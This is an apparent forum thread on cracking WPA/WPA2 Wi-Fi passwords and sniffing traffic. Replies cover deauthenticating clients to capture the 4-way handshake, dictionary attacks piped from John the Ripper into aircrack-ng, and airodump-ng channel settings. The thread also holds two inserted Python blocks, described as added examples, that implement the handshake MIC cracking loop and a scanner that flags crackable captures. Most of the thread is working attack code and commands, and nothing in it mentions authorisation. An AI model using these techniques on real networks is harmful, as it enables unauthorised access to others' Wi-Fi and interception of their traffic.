aperfectcircle1

Cracking and Sniffing WPA/WPA2 BT4

13 posts in this topic

Hi. I was wondering how I might crack a WPA/WPA2 network and sniff traffic. I've heard that putting your card in promiscuous mode and sniffing doesn't work because of the client key. From what I understand, I deauth a station with aireplay and capture the 4-way handshake to get one of the keys. I'm still unclear as to what I need to do afterwards with my airodump-ng file to get the other one, and what I need to do to sniff the traffic.

Edited by aperfectcircle1

With the 4-way handshake you have all the information you need to perform a dictionary attack. The best tool I've used for this is pyrit (fastest speeds, network support, and it can use a compatible graphics card). Aircrack-ng is also good, but coWPAtty is by far the slowest, although it works well with pre-computed tables.

The theory in a nutshell:

During the handshake two random values (one from the AP, the other from the client) are used together with the ESSID, the key and the MAC addresses of the client and AP to generate a MIC (Message Integrity Check) which is appended to the packets. With the handshake an attacker has access to everything except the key, so we try possible keys, comparing the MIC each time. If we find a MIC that matches, then we have the right key. Due to the algorithm used this can be a very slow process.

The actual process is a little more complicated. The handshake is actually used to create temporal keys, group keys, etc., but the above is essentially correct.

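The derivation sketched in the reply above, carried through in code. This is an added example and not code from the original post or from pyrit/aircrack-ng: it implements the WPA2 (HMAC-SHA1 descriptor) case of PBKDF2 passphrase-to-PMK, the 802.11i PRF-512 that expands the PMK with both MACs and both nonces into the PTK, and the MIC over EAPOL-Key message 2 using the first 16 bytes of the PTK (the KCK). The SSID, MAC addresses, nonces, passphrase and wordlist are all constructed; `build_message2` plays the client so that the sample frame carries a valid MIC, and `crack` is the attacker's loop that recomputes the MIC per candidate. WPA/TKIP handshakes use HMAC-MD5 for the MIC instead and are not handled here.

```python
import hashlib
import hmac
from typing import Iterable, Optional

# All values below are constructed for this example; nothing comes from a real capture.
SSID = b"ExampleNet"                      # hypothetical ESSID
AP_MAC = bytes.fromhex("00aabbccddee")    # hypothetical AP BSSID
STA_MAC = bytes.fromhex("001122334455")   # hypothetical client MAC
ANONCE = bytes(range(32))                 # hypothetical AP nonce (from message 1)
SNONCE = bytes(range(32, 64))             # hypothetical client nonce (from message 2)
MIC_OFFSET = 81                           # offset of the 16-byte MIC field inside an EAPOL-Key frame


def pmk_from_passphrase(passphrase: str, ssid: bytes) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The 4096 iterations are what makes each candidate expensive to test."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion", min(MACs) || max(MACs) || min(nonces) || max(nonces))."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):
        out += hmac.new(pmk, b"Pairwise key expansion" + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]  # KCK = bytes 0..15, KEK = 16..31, TK = 32..47


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2 MIC: HMAC-SHA1 over the EAPOL-Key frame with the MIC field zeroed, truncated to 16 bytes."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_message2(passphrase: str) -> bytes:
    """Client side: build EAPOL-Key message 2 and fill in a valid MIC.
    This is what an attacker captures; the passphrase is only used to produce the sample."""
    key_info = (0x010A).to_bytes(2, "big")                 # descriptor v2 (HMAC-SHA1), Pairwise, MIC
    frame = (b"\x02\x03" + (95).to_bytes(2, "big")         # EAPOL version 2, type Key, body length
             + b"\x02" + key_info + (16).to_bytes(2, "big")  # RSN descriptor, key info, key length
             + (1).to_bytes(8, "big")                        # replay counter
             + SNONCE + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8  # nonce, IV, RSC, ID
             + b"\x00" * 16                                  # MIC placeholder
             + (0).to_bytes(2, "big"))                       # key data length (RSN IE omitted)
    ptk = ptk_from_pmk(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    return frame[:MIC_OFFSET] + eapol_mic(ptk[:16], frame) + frame[MIC_OFFSET + 16:]


def crack(message2: bytes, candidates: Iterable[str]) -> Optional[str]:
    """Attacker side: recompute the MIC for each candidate passphrase and compare with the captured one."""
    captured_mic = message2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in candidates:
        if not 8 <= len(candidate) <= 63:                  # WPA passphrase limits; skip junk before PBKDF2
            continue
        ptk = ptk_from_pmk(pmk_from_passphrase(candidate, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
        if hmac.compare_digest(eapol_mic(ptk[:16], message2), captured_mic):
            return candidate
    return None


if __name__ == "__main__":
    sample = build_message2("correct horse battery")
    print(crack(sample, ["letmein", "short", "correct horse battery", "other123"]))
```

Everything an attacker needs (SSID, both MACs, both nonces, the MIC and the frame it covers) sits in the capture; only the passphrase is missing, and PBKDF2 with 4096 iterations per guess is the cost that pyrit pushes onto the GPU.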

Where do you get wordlists that have passwords like y1231u312y31gu312g? Pyrit is good? I have an nvidia GeForce 6800 and couldn't get the drivers to work with Linux, but maybe I'll try again.

Getting decent wordlists is difficult, and luckily Backtrack provides a good WPA list. It's pretty large and needs to be installed from the repositories, but it can also be downloaded and extracted manually. I tried looking for the link but can't seem to find it at the moment.

You can find more lists by searching, but it takes a while when you first start out :tongue:

Some bad news: I don't think that your card is supported. If you can get a newer card you'll definitely see some improvements.

Where is this list!

I've never tried the precomputed wordlists, but usually just use JtR rules. Send them to stdout using the --stdout switch and use the "-" character in cowpatty to define the wordlist. Of course this isn't a sure way to crack WPA.

Isn't cowpatty the slowest? Anyone got a link to a good WPA wordlist for aircrack or pyrit?

Then just use: ./john --wordlist=password_list --rules --stdout | aircrack-ng -e ssid -w - capture_file

Here are some wordlists. To make them go quicker for WPA, use something like: ./john --wordlist=password_list --rules --stdout | egrep "^.{8,63}$" | unique | aircrack-ng -e ssid -w - capture_file. That should filter out all words that are not at least 8 chars or that are more than 63 (the closing $ is needed, otherwise the pattern only enforces the minimum length).

Edited by tekio

Thanks guys! Also, for the WPA handshake, sometimes I'm unable to capture it after deauthing a station; what could I do to fix this? I've heard things like setting your speed to be the same as the AP or station, so what does that mean if the AP and station both have 54e-54e by them? And iwlist doesn't show modulation modes for me, so how do I set my modulation or mode to the same as the AP? And how do I determine the mode of the AP? Thank you!

Capturing the handshake can be tricky sometimes. What application are you using to capture? I assume airodump-ng. Before worrying too much about the more complicated stuff, I would make sure that you're listening on the correct channel. It is also important that you are not too far from or too near to the access point and client.

If you open the capture file in Wireshark and filter for "eapol" you should see any handshake packets you've received, which may give you a clue as to what went wrong.

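The Wireshark "eapol" check suggested above, done as an added example in Python so it can be scripted over many capture files. This is not code from the post or from the aircrack-ng suite. It reads a classic pcap of raw 802.11 frames (linktype 105, no radiotap header; a radiotap capture would need the header stripped first), picks out EAPOL-Key frames, works out which of the four handshake messages each one is from the Key Information flags, and reports per (BSSID, station) pair whether enough of the handshake is present to attack: message 2 (client MIC and SNonce) plus the ANonce from message 1 or 3. The capture it runs on is built in memory by `build_sample_pcap` with hypothetical MAC addresses and zeroed nonces; it is constructed, not a real handshake.

```python
import struct
from collections import defaultdict
from typing import Dict, FrozenSet, Optional, Tuple

LLC_SNAP_EAPOL = bytes.fromhex("aaaa03000000888e")   # LLC/SNAP header for EtherType 0x888e (EAPOL)
DLT_IEEE802_11 = 105                                   # raw 802.11 frames, no radiotap header
# EAPOL-Key "Key Information" flag bits (IEEE 802.11i)
KI_PAIRWISE, KI_INSTALL, KI_ACK, KI_MIC, KI_SECURE = 0x0008, 0x0040, 0x0080, 0x0100, 0x0200


def iter_pcap_packets(data: bytes):
    """Yield the packet bytes of each record in a classic (non-pcapng) pcap file."""
    endian = {0xA1B2C3D4: "<", 0xD4C3B2A1: ">"}.get(struct.unpack("<I", data[:4])[0])
    if endian is None:
        raise ValueError("not a classic pcap file")
    if struct.unpack(endian + "I", data[20:24])[0] != DLT_IEEE802_11:
        raise ValueError("expected raw 802.11 frames (linktype 105); strip radiotap first")
    off = 24
    while off + 16 <= len(data):
        incl_len = struct.unpack(endian + "IIII", data[off:off + 16])[2]
        off += 16
        yield data[off:off + incl_len]
        off += incl_len


def extract_eapol(frame: bytes) -> Optional[Tuple[bytes, bytes, bytes]]:
    """Return (bssid, station, eapol) for an 802.11 data frame carrying EAPOL, else None."""
    if len(frame) < 24 or (frame[0] & 0x0C) != 0x08:       # frame type 2 = data
        return None
    hdr_len = 26 if frame[0] & 0x80 else 24                # QoS-data subtypes carry 2 extra bytes
    addr1, addr2 = frame[4:10], frame[10:16]
    to_ds, from_ds = frame[1] & 0x01, frame[1] & 0x02
    if to_ds and not from_ds:                              # station -> AP: addr1 = BSSID, addr2 = SA
        bssid, station = addr1, addr2
    elif from_ds and not to_ds:                            # AP -> station: addr1 = DA, addr2 = BSSID
        bssid, station = addr2, addr1
    else:
        return None
    body = frame[hdr_len:]
    if not body.startswith(LLC_SNAP_EAPOL):
        return None
    return bssid, station, body[len(LLC_SNAP_EAPOL):]


def classify_eapol_key(eapol: bytes) -> int:
    """Return 1..4 for a 4-way handshake message, 0 for anything else (group-key messages included)."""
    if len(eapol) < 99 or eapol[1] != 3:                   # EAPOL type 3 = EAPOL-Key
        return 0
    key_info = struct.unpack(">H", eapol[5:7])[0]
    key_data_len = struct.unpack(">H", eapol[97:99])[0]
    if not key_info & KI_PAIRWISE:
        return 0
    if key_info & KI_INSTALL:
        return 3
    if key_info & KI_ACK:
        return 1
    if key_info & KI_MIC:                                  # 2 and 4 differ by the Secure bit / empty key data
        return 4 if (key_info & KI_SECURE or key_data_len == 0) else 2
    return 0


def find_handshakes(pcap: bytes) -> Dict[Tuple[str, str], FrozenSet[int]]:
    """Map (bssid, station) -> set of handshake message numbers seen in the capture."""
    seen = defaultdict(set)
    for frame in iter_pcap_packets(pcap):
        parsed = extract_eapol(frame)
        if parsed is None:
            continue
        bssid, station, eapol = parsed
        msg = classify_eapol_key(eapol)
        if msg:
            seen[(bssid.hex(":"), station.hex(":"))].add(msg)
    return {pair: frozenset(msgs) for pair, msgs in seen.items()}


def crackable(messages) -> bool:
    """Message 2 carries the client MIC and SNonce; the ANonce has to come from message 1 or 3."""
    return 2 in messages and (1 in messages or 3 in messages)


# --- constructed sample capture (hypothetical MACs, zeroed nonces; not a real handshake) ---
def _eapol_key(key_info: int, key_data: bytes = b"") -> bytes:
    body = (b"\x02" + struct.pack(">HH", key_info, 16) + b"\x00" * 8 + b"\x00" * 32 + b"\x00" * 16
            + b"\x00" * 8 + b"\x00" * 8 + b"\x00" * 16 + struct.pack(">H", len(key_data)) + key_data)
    return b"\x02\x03" + struct.pack(">H", len(body)) + body


def _data_frame(src: bytes, dst: bytes, bssid: bytes, to_ds: bool, payload: bytes) -> bytes:
    a1, a2, a3 = (bssid, src, dst) if to_ds else (dst, bssid, src)
    return b"\x08" + bytes([0x01 if to_ds else 0x02]) + b"\x00\x00" + a1 + a2 + a3 + b"\x00\x00" + LLC_SNAP_EAPOL + payload


def build_sample_pcap(include_m3: bool = True) -> bytes:
    ap, sta = bytes.fromhex("00aabbccddee"), bytes.fromhex("001122334455")  # hypothetical MACs
    rsn_ie = b"\x30\x02\x01\x00"                                              # stub RSN IE as key data
    frames = [_data_frame(ap, sta, ap, False, _eapol_key(0x008A)),            # M1: pairwise|ack
              _data_frame(sta, ap, ap, True, _eapol_key(0x010A, rsn_ie))]     # M2: pairwise|mic
    if include_m3:
        frames.append(_data_frame(ap, sta, ap, False, _eapol_key(0x13CA, rsn_ie)))  # M3: install|ack|mic|secure
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, DLT_IEEE802_11)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1000 + i, 0, len(frame), len(frame)) + frame
    return out


if __name__ == "__main__":
    for pair, msgs in find_handshakes(build_sample_pcap()).items():
        print(pair, sorted(msgs), "crackable" if crackable(msgs) else "incomplete")
```

If the script shows only message 1 for a pair, the deauth worked but the client's reply was missed, which is usually a channel or range problem as described above; if it shows nothing at all, the card was not on the AP's channel when the client reconnected.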

Yup, using airodump-ng. Do I need to configure tx-power or frequency? For some reason my card won't go above 27.

You probably won't have to change the power (which I don't think is supported by all cards anyway), but you will need to make sure you are listening on the right channel (frequency). This can be done when you put your card into monitor mode with

airmon-ng start <interface> <channel>

or by selecting a channel with

airodump-ng -c <channel> <interface>
